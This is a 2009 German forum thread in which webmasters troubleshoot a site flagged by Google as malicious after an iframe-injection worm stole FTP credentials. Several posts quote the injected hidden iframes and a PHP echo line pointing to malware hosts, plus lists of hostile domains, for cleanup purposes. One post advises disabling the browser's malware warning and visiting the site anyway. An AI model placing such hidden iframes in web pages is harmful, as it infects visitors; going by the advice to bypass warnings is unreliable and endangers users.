Webseite wird als virenverseucht gemeldet

  • Ich habe jetzt extra auf Linux umgeschaltet, da ich dort andere Sicherheitseinstellungen im FF habe..


    Angezeigt bekomme ich:


    "
    Als attackierend gemeldete Website
    Die Website auf http://www.hobbyceramics.be wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert.


    Attackierende Websites versuchen, Programme zu installieren, die private Informationen stehlen, Ihren Computer verwenden, um andere zu attackieren oder Ihr System beschädigen.


    Manche Websites vertreiben bewusst Viren und ähnlich schädliche Software, aber viele Websites sind auch ohne das Wissen oder die Erlaubnis des Betreibers kompromittiert.
    "


    Begründung:
    "
    Wie ist die gegenwärtige Einstufung von http://www.hobbyceramics.be?


    Diese Website ist als verdächtig eingestuft. Das Aufrufen dieser Website kann schädlich für Ihren Computer sein!


    Ein Bestandteil dieser Website wurde in den letzten 90 Tagen 4 mal aufgrund verdächtiger Aktivitäten auf die Liste gesetzt.


    Welche Befunde hat Google beim Besuch dieser Website festgestellt?


    Bei 10 Seite(n) von insgesamt 13 Seiten dieser Website, die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2009-08-14 und verdächtiger Content wurde auf dieser Website zuletzt am 2009-08-14 gefunden.


    Malicious software includes 6 trojan(s).


    Die Malware wird in 2 Domain(s) gehostet, darunter x9y.ru/, 3b7.ru/.


    This site was hosted on 1 network(s) including AS5432 (BELGACOM).


    Hat diese Website als Überträger zur Weiterverteilung von Malware fungiert?


    In den letzten 90 Tagen hat http://www.hobbyceramics.be anscheinend nicht als Überträger für die Infektion von Websites fungiert.


    Hat diese Website Malware gehostet?


    Nein, diese Website hat in den letzten 90 Tagen keine Malware gehostet.


    Wie kam es zu dieser Einstufung?


    Gelegentlich wird von Dritten bösartiger Code in legitime Websites eingefügt. In diesem Fall wird unsere Warnmeldung angezeigt.


    Nächste Schritte:


    * Zur vorherigen Seite zurückkehren.
    * Falls Sie Eigner dieser Website sind, können Sie eine Überprüfung Ihrer Website mit den Google Webmaster-Tools anfordern. Weitere Informationen über den Prüfprozess erhalten Sie in der Hilfe für Webmaster.
    "

  • DAS zu den aktuellen Fakten.


    Die Warnung beruht allein auf den Sicherheitseinstellungen des Browsers.
    Nicht das Antivirenprogramm meldet sie, sondern eine Datenbank mit der sich der Browser bereits vor Aufrufen der Seite in Verbindung setzt.


    Die Kriterien und die Aktualisierung der Datenbank sind nicht wirklich ersichtlich.
    Man kann nämlich eine Seite melden - was auch durchaus aus Konkurrenzneid geschehen kann.


    Mittlerweile ist bekannt, dass Google Seiten als "Virenschleudern" kennzeichnet, wenn die Seite auf bestimmten russischen Servern erwähnt/verlinkt wurde oder jemand meldet, dass es eine irgendwie geartete Verlinkung dorthin gibt.


    -------------------
    Meine persönliche Empfehlung an User solcher betroffener Seiten:
    1. automatische Überprüfung im Browser abschalten, ob weine Webseite als attackierend gemeldet wurde.
    2. den eigenen AV und Firewall "scharf einstellen" und dann die Seite trotzdem besuchen.


    WENN die Seite WIRKLICH Schadcode enthält, verlasse ich mich eher auf das eigene System als auf seltsame Datenbanken !!!

    EDIT:
    Spätere Erkenntnisse zeigen auf, dass es sich um einen Wurmcode handelt, der sich vorrangig an FTP-Programme hängt, die Kennwörter ausspioniert und sich dann selbst per FTP auf den Server installiert.
    Betroffen sind sowohl iframes als auch java... deshalb bitte erst weiterlesen !!!
    Edit 30.08.09 by BigJohn

    ---
    Meinen Empfehlung an Seiteninhaber:
    http://www.google.com/support/…in/answer.py?answer=45432


    Sofern man sich bei den Webmastertools anmeldet, kann man eine Überprüfung der Seite veranlassen und bekommt auch weitere Möglichkeiten und Hilfen.

  • Hallo das sagt der Support von denen ... http://www.google.com/support/…b360004718e1c2713b7&hl=de



    ich schreibe dort weil mein freund noch weniger Ahnung hat von PC als ich ...
    Aber schon ein Hammer wie lange das dauert und ihn laufen seine Kunden davon ...


    MfG Ralf


    bin mal gespannt wann das weg ist


    [Blockierte Grafik: http://ratgeber.cwsurf.de/wbb3/file:///C:/DOKUME%7E1/Ralf/LOKALE%7E1/Temp/moz-screenshot.png]

    Bilder

    • google speere.JPG

    Einmal editiert, zuletzt von Rally ()

  • Vielen Dank @ Rally. :thumbsup::thumbsup::thumbsup:


    Der User Phantastor hat die Malware im Code ausfindig gemacht.
    Die Malware ist also nicht wirklich auf der Seite vorhanden, sondern die Malwareseite wird per iframe in die eigene Seite eingebunden !


    Die Seite wurde also entweder
    -angegriffen und verändert
    oder
    -man hat ein seltsames Werbe-iFrame zugelassen


    ---------------------


    Der User "Phantastor" hat die gleiche Einstellung wie ich:
    Ein einziges AV-Programm genügt nicht - auch wenn die AV-Hersteller anders argumentieren.

  • Heute geht die Seite wieder . Endlich .


    Und hoffentlich bleibt das auch so .


    Finde ich aber ein Ding das es Google möglich ist Seiten zu Blocken und User sehr zu verunsichern , mal abgesehen von den Ärger den mein Freund hatte .( Mails und Telefonate ..)


    Hoffe das es jetzt so bleibt und es war ein Zähler der seiner Besucher zählt



    <body bgcolor="#2675DA" text="#000000" link="#000000" vlink="#000000" alink="#000000"><iframe src="http://3bq.ru:8080/index.php" width=106 height=136 style="visibility: hidden"></iframe>


    der in ein frame angezeigt wird .


    MfG Ralf


    Habe den URL-Link rausgenommen (rot). Wer sie anklickt, läuft in eine Malware-Falle !
    Edit by BigJohn

  • Google blockt die Seiten ja nicht.
    Google schreibt in eine Datenbank, dass sie dort Malware gefunden hat.


    Und die Browser greifen auf diese Datenbank zu.
    Schuld ist also vorrangig der Browserhersteller, dass er nur allein auf die Google-Datenbank zugreift und nicht auf eine Vielzahl anderer.


    Du hast gesehen, dass ich den Link aus deinem Beitrag editiert habe.
    Das habe ich gemacht, damit keiner irrtünmlich oder aus Neugierde darauf klickt.

  • Ja sicher Big John ist schon richtig , habe ich vergessen ....


    Aber was noch wichtig ist zu erwähnen .
    Der Zähler war es nicht allein , da muss einer was geknackt haben.
    Ich nehme an das es der FTP Passwort ist.


    Weil der Zähler ist sauber http://www.nedstat.de/ der Code vom Zähler wurde also geändert , kam mir gleich komisch vor , weil Zähler keine frame benutzen.


    Habe versucht das zu ändern , aber er hat kein Kontroll-Panel oder so was. mal schauen wie das geht
    Und hoffe das da nicht neue Code eingeschleust werden .


    MfG Ralf

    Google blockt die Seiten ja nicht.
    Google schreibt in eine Datenbank, dass sie dort Malware gefunden hat.


    Und die Browser greifen auf diese Datenbank zu.
    Schuld ist also vorrangig der Browserhersteller, dass er nur allein auf die Google-Datenbank zugreift und nicht auf eine Vielzahl anderer.


    Du hast gesehen, dass ich den Link aus deinem Beitrag editiert habe.
    Das habe ich gemacht, damit keiner irrtünmlich oder aus Neugierde darauf klickt.

  • Oh es ist noch was zu tuen , in den support Forum haben die auf das verlinkt ...
    Drive-by-Infektionen


    zitat von Link oben :


    Hallo liebe Foren-Gemeinde!


    In einem überaus interessanten Artikel der aktuellen Ausgabe des Internet Magazin aus dem Magnus Verlag stieß ich auf Background-Infos zum hier von so vielen verärgerten Webserver/-site-Betreibern geschilderte Phänomen des Malware-Befalls.


    Darin wird die Funktionsweise sog. Drive-by-Infektionen beschrieben, wobei Malware mittels JavaScript, bekannt als Gumblar (JSRedir-R), seit Mitte Mai wohl Tausende Webserver infiziert, Google-Suchanfragen auf verseuchte Hacker-Webseiten umlenkt sowie Googles Gegenmaßnahmen erklärt.


    Gefährlich werden Drive-by-Infektionen, deren wahres Ausmaß Sicherheitsexperten wohl nur auf Grund einer Google-Studie mit gewöhnlichen Crawling-Aktivitäten mehrerer Milliarden Webseiten innerhalb von 12 Monaten erkannten, weil die Malware allein durch "bloßes Vorbeisurfen durch vollkommen legitime und ansonsten vertrauenswürdige Internet-Nachbarschaften" ohne jegliche Linkbetätigung ausgelöst werden und Systeme infizieren - selbst Firewalls und Virenscanner bleiben unter Umständen wirkungslos.
    Gumblar z.B. lotet Sicherheitslücken von Webservern aus oder fängt speziell noch häufiger FTP-Zugangsdaten ab bzw. lenkt auf gefälschte Google-Suchergebnisseiten, um sich weiter zu verbreiten - infizierte Systeme verbleiben mit mehreren offenen Hintertüren, wie z.B. veränderten Zugriffsrechten oder mit verschlüsseltem Code verseuchte legitime JavaScript-Dateien, die nicht unmittelbar als bösartig auffallen.


    Als Infektionswege wurden Sicherheitslücken von Webservern, extern eingebundene Werbung, von Web-Besuchern beisteuerbare Beiträge sowie Dritthersteller-Widgets identifiziert - oft werden iframes auf Grund von (Add-On)Sicherheitslücken in Vorlagen beliebter CMS-Systeme eingefügt und tarnen einen keiner Zustimmung bedürfenden Malware-Download. Auch Browser-Plug-Ins, mittels JavaScript auf die Adobe Reader-Engine gestarteter DoS-Attacke einer durch Drive-by-Download übertragenen PDF-Datei oder der bei Installation von .NET 3.5 SP1 durch Microsoft heimlich im Firefox eingerichteten Erweiterung .NET Framework Assistant werden Gumblar-Attacken ermöglicht bzw. offensichtlich.


    Doch wie immer, hat Google auch hier reagiert - es wurden Heuristiken entwickelt, um Drive-by-gefährdende Internet-Seiten in den Suchergebnissen zum Schutz der Google-Nutzer zu kennzeichnen und oftmals die Webmaster per E-Mail darüber zu informieren.


    Neben dem Hinweis auf die Verantwortlichkeit von Server-/Site-Betreibern entsprechende Vorsorgemaßnahmen, wie z.B. FTP- durch SFTP-Zugänge zu ersetzen, Server-Software zu aktualisieren, Scripte und Installationen von Scriptsprachen auf Sicherheitslöcher zu prüfen u. a., bei noch nicht infizierten Systemen zu ergreifen muß dennoch auch bewußt werden, dass es bei infizierten Systemen nicht genügt, den bösartigen Code - sofern überhaupt erkennbar - zu entfernen, Zugriffsrechte zu korrigieren, die sichere Variante des FTP-Protokolls zu benutzen oder generell in CMS-Systemen einfach alle und mitunter durchaus legitimen und zur Funktion notwendigen <iframe>- und <script>-Tags zu löschen - sofern "die ursprüngliche Sicherheitslücke nicht behoben wurde oder im System noch eine Hintertür vorhanden ist, werden Attacken auf den Server/die Site nicht aufhören".
    Bei größeren Projekten oder Servern sollte zum Auffinden und Desinfizieren der iframe-Injection der kostenpflichtige Dienst Servertune Iframe Shield genutzt werden.


    Mich erschreckt jedenfalls das offensichtlich doch nicht einschätzbare Potential, sowie die dadurch verursachten oder noch verursacht werdenden Schäden solcher "Erfindungen" - und sie werden wohl nicht weniger... oder was meint ihr?


    (Hinweis: alle Rechte der zitierten Textpassagen liegen beim Verlag!)


    P.S.: Wär's nicht schön, so 'nen Beitrag pinnen zu können? ;-)


    Zitat Ende :


    Also was es alles Gibt ......


    MfG Ralf

  • Löst der Code die Probleme .? 2

    1. Ja (0) 0%
    2. Nein (2) 100%
    3. Weiss nicht (0) 0%
    4. ist ein Versuch Wert. (0) 0%

    Hallo ich habe versucht mein Freund da zu zu überreden den Webspace Anbieter zu wechseln , leider vergebens ...


    heute hat er endlich ein neues PW für den FTP Zugang , und sein Anbieter sagte am Telefon , das sie nicht zuständig sind um den Server sicherer zu machen .
    Diesen Link haben sie ihm noch geschickt was er machen sollte ...(


    www.diovo.com/2009/03/hidden-iframe-injection-attacks


    nur schade das er und ich nicht so gut englisch können was man genau machen soll..


    Weiß jemand welchen Code man auf den Space geladen werden soll.


    Danke schon mal , aber ich persönlich glaube das es nicht zum Erfolg führt , was meint Ihr ...


    MfG Ralf

  • In deinem Link wird hauptsächlich das gleiche Problem besprochen.
    Es werden die verursachenden Codes genannt.


    Es wird aber auch erwähnt, wie sich der Code einschmuggeln konnte


    1) Der Server ist kompromittiert/verseucht
    Das ist der am Häufigsten vorkommende Fall. Man merkt es daran, dass nicht nur dein eigener Webspace betroffen ist, sodnern auch andere.
    Hat sich einmal so ein Code auf dem Server eingenistet, breitet er sich über alle Webspaces aus.


    2) Der eigene Rechner ist verseucht
    Es gibt Würmer, die still deine Passwörter und Zugänge für den FTP mitlesen, auf den Server gehen und ihn infizieren. Er fügt dann den Wurmcode in alle index.* - Files ein.
    -----
    soweit diese Diskussion.

    Für mich bedeutet das: Weg vom Server !!!

    Wenn der Betreiber meint, es wäre Usersache, den Server zu reinigen, sollte man ihn allein lassen. Es ist schließlich sein Job !
    Dein Bekannter hat nur einen Webspace gemietet und ist deshalb nicht für den gesamten Server verantwortlich.


    Nachdem ich jetzt selbst weiß, wie sich der Wurm ausbreitet, habe ich meine letztens hochgeladenen Indexes mit einem Editor geöffnet.
    Da ich dort nur HTML verwendet habe, konnte ich zum Glück leicht feststellern, dass keine iframes eingebaut wurden .. Glück gehabt *lach*


    --------------------------------


    Zu dem angeblichen Code, der den Wurm auf dem Server beseitigen soll:
    Finger weg, wenn du nicht weißt woraus er besteht. Er kostet 10 USD.. könnte leider eine Abzocke sein.


    außerdem: das Script soll nur das automatisieren, was du auch per Hand machen kannst:


    nämlich folgenden Code in jeder index.*-Datei durch ein Leerzeichen zu ersetzen

    Zitat

    <iframe src=\”http://[^"]*” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>


    echo \”<iframe src=\\\”http://[^"]*\” width=1 height=1 style=\\\”visibility:hidden;position:absolute\\\”></iframe>\”;


    Du brauchst den php-Code also nicht.


    ==============================================================================================
    Die Abwehrmaßnahmen lauten in Kurzform:


    1. PC mit einem AV überprüfen lassen (im Artikel wurde Avast empfohlen)
    2.Alle Zugangskennungen für den Webspace und FTP ändern
    3.Alle Dateien vom Server auf den PC laden und den Wurmcode entfernen.
    PS: ich würde jetzt erneut den PC mit einem AV überprüfen lassen
    4.Hoster informieren, damit eine Ausbreitung verhindert werden kann


    Man kann sehen, was Google in seiner Datenbank über eine Seite gespeichert hat, indem man folgenden Link aufruft:
    http://www.google.com/safebrow…site=http://Seitenname.de
    ("Seitenname.de" durch den Namen der Seite ersetzen)


    ==========================================================================
    Folgende Codes sind weiterhin Wurmcodes:

    Zitat

    <iframe src=”http://hostverify.net/?click=2730375″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>


    <iframe src=”http://hosttracker.net/?click=32431937″ width=1 height=1 style=”visibility:hidden;position:absolute”>


    Zitat

    <script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){… etc.


    Diese Server hosten den Wurmcode


    Wer diese Adressen in seiner index findet, kann sicher sein, dass sie den Wurmcode enthält.


    Achtung: Dieses ist nur eine sinngemäße Übersetzung gewesen.


    Es geht weiter......... mit einer anderen Seite

  • Habe ihn den link nach hier auch geschickt , hoffe nur das er das auch liest und handelt ...


    diesen link schickte er mir ... http://www.hackalarm24.com/fro…725020a06a854cc94d7ac6f26


    Was ist Hackalarm24?


    Edit: Der folgende Text wurde versteckt und ist nur Usern sichtbar, da es sich um einen reinen Werbetext handelt, der nicht zur Lösung beiträgt
    Edit by BigJohn

    [hide]

    Immer häufiger greifen Würmer still und heimlich Webseiten an und
    infizieren Webdateien mit dem Ziel, die Webseitenbesucher der
    betroffenen Internetseiten mit Würmern und Trojanern zu infizieren.


    Wurde eine Website infiziert, so besteht dringender Handlungsbedarf!


    Ungünstigerweise bemerken Seitenbetreiber Infizierungen jedoch meist
    erst viel zu spät. Im günstigsten Fall funktioniert die Website bereits
    unmittelbar nach der Attacke nicht mehr ordnungsgemäß, sodass die
    Infektion noch rechtzeitig festgestellt werden kann. In den meisten
    Fällen jedoch muss erst ein Webseitenbesucher bzw. ein Kunde darauf
    aufmerksam machen, dessen Rechner durch die infizierte Website
    ebenfalls infiziert wurde. Ein enormes Problem ergibt sich aber erst,
    wenn der Zeitpunkt der Infizierung schon mehrere Tage zurück liegt und
    der Provider über kein sauberes Backup mehr verfügt...


    Hackalarm24 schafft Abhilfe:


    Hackalarm24 informiert Sie umgehend per E-Mail oder SMS,
    wenn es Anzeichen dafür gibt, dass Ihre Website oder Ihr Onlineshop
    gehackt wurden.


    Hackalarm24 erkennt den Großteil aller derzeit verbreiteten
    Webseitenwürmer, kann Sie rechtzeitig über eine mögliche Infizierung
    informieren und Tipps zur Wiederherstellung geben.


    Des weiteren beschäftigt sich Hackalarm24 auch mit
    Vorsorgemaßnahmen, sodass es erst gar nicht so leicht zur bösen
    Überraschung kommen kann. 100% Schutz vor Hackattacken wird es jedoch
    leider niemals geben.


    Gerne informieren wir Sie näher, wir freuen uns auf Ihre Kontaktaufnahme.[/hide]


    aber ob das der richtige weg ist blaube ich auch nicht ... dann ist das Kind ja schon im Brunnen gefallen ..

  • ... Fortsetzung


    Die Codeprogrammierer benutzen jetzt auch MD5 um einen javascript Wurm Code einzubauen !!!
    Diese verweisen auf

    Zitat

    xtrarobotz .com
    live-counter .net
    hyperliteautoservices .cn
    namebuypicture .cn
    superbetfair .cn


    Das Script zielt allein auf User-FTP-Applikationen !


    Quelle: http://www.sulumitsretsambew.org/iframe-worms/


    ÜBRIGENS....
    im Teil 1 wurde erwähnt, dass nur die INDEX-Files betroffen wären.
    Auf einer anderen Seite habe ich erfahren, dass auch Dateien verseucht werden, die folgende Namen enthalten:
    * main
    * default
    * index
    * home



    Ein Trojaner wurde gefunden, der den Wurm verbreitet.

    Dieser nistet sich unter Programme/Adobe/Acrobat/Reader/ActiveX ein


    Er tarnt sich als Datei namens "AcroIEhelper.dll", Findet man diese Datei, kann man sicher sein, dass der eigene PC verseucht ist.


    Quelle:http://www.qualitycodes.com/tutorial.php?articleid=29

    Diese Seite bietet übrigens ein kostenloses Script an, das man auf den Server hochladen kann um die verseuchten Dateien zu finden.

    Den Code kann man unter http://www.qualitycodes.com/tu…Misc/virus-detect.php.txt sehen.


    PS: wer den Code von der Seite lädt: Vor dem Upload die Downloaddatei "virus-detect.php.txt" in "virus-detect.php" umbenennen

  • Die Hackalarmseite bietet einen kostenlosen Test an.
    http://www.hackalarm24.com/fro…ckextern.html&groupId=200


    So schnell wie der geht ... vor allem sagt er nichts über die Quelle aus. Das ergebnis lautet z.B. "OK: Keine Spuren erfolgreicher Hackattacken gefunden! "
    Da sagt die Googlesuche doch schon mehr aus



    Hackalarm24 ist ansonsten eine kommerzielle Seite aus Österreich, die ihre Dienste verkaufen möchte.
    Sie bietet auch eine "Notrufnummer" an.
    Österreich: 0900 / 520006 (2,17 Euro/min)
    Deutschland: 0900 / 1900330 (2,00 Euro/min)

  • @ Rally
    Leider lassen sich Webseiten nicht gegen Viren und Codes impfen.


    Man kann immer nur "nacharbeiten" -
    ooder - man muss die CMOD-Rechte eben nur auf lesen setzen... was bei Foren usw. leider die Funktion einschränkt oder komplett verhindert.

  • Habe Grade eine Mail bekommen , das hat er in den Forum von seinen Programm mit den er seine Webseite erstellt gefunden ...


    [Blockierte Grafik: http://www.webtodateforum.de/f…tation/reputation_pos.gif
    [Blockierte Grafik: http://www.webtodateforum.de/forum/images/icons/icon4.gifWebsite Angriffserkennung und Abwehr mit PHPIDS
    Ihr möchtet eure Webseite vor Attacken aus dem Internet schützen ?
    Kein Problem mit dem frei verfügbarem PHPIDS



    Das Archiv entpacken und nur den Ordner lib auf euren Webserver kopieren.


    Dann erstellt Ihr eine Datei ids.php mit folgendem Inhalt und kopiert diese auf euren Webserver. Es muss der Pfad zu lib auf euren Server angepasst werden und $Result die Schwelle ab der blockiert wird... wobei 10 schon ein optmaler Wert ist. Falls Ihr eine Logdatei schreiben wollt muss diese durch den Webserver beschreibbar sein chmode 666
    hier der link .. Website Angriffserkennung und Abwehr mit PHPIDS


    denke das es funktioniert , was meint ihr ..;...
    MfG Ralf

  • Es handelt sich bei diesem Code um einen Floodschutz, der gegen Brute Force und DDoS Attacken helfen soll.


    Der Wert >10 ist in der Hinsicht kritisch, als dass dadurch sehr viele Besucher mit FF+bestimmten Plugins ausgeschlossen werden.
    Er ist nach heutigem Standard (wegen RSS+Atom Feeds) zu niedrig angesetzt.


    WBB-Foren wird dieser Schutz als fertiges Plugin kostenlos geliefert: "Secuyrity System Basic" (erhältlich in der WLcomm)
    Bei phpBB.Foren ist er bereits eingebaut.


    Für diese Forentypen würde das Script nicht nurunnötig, sondern auch durchaus kontraproduktiv sein, da die internen Möglichkeiten einfacher zu bedienen sind und auch mehr Informationen bieten.
    Zudem würde das Zusatzscript auch gegen die Forenfunktion arbeiten.

  • also seid Sonntag ist die Hp wieder frei , von Viren... , seid der neue Code für den FTP hat bleiben die draußen,...
    Hoffe nur das die es nicht wieder probieren und ihn jetzt in ruhe lassen ...
    Aber das ist ein PW was nur 6 stellen hat , und das ändern ist nicht möglich wie es eigentlich gehen soll , via Internet ...


    Er muss ein Fax schicken und die machen es dann , was ich nicht verstehe , normalerweise dauert so was ein paar Minuten und nicht Tage..


    An seiner Stelle hätte ich ein 30 stelliges genommen .. oder ein 6 stelliges jede Woche wechseln.
    Also mal abwarten wie lange es dauert ...


    MFG Ralf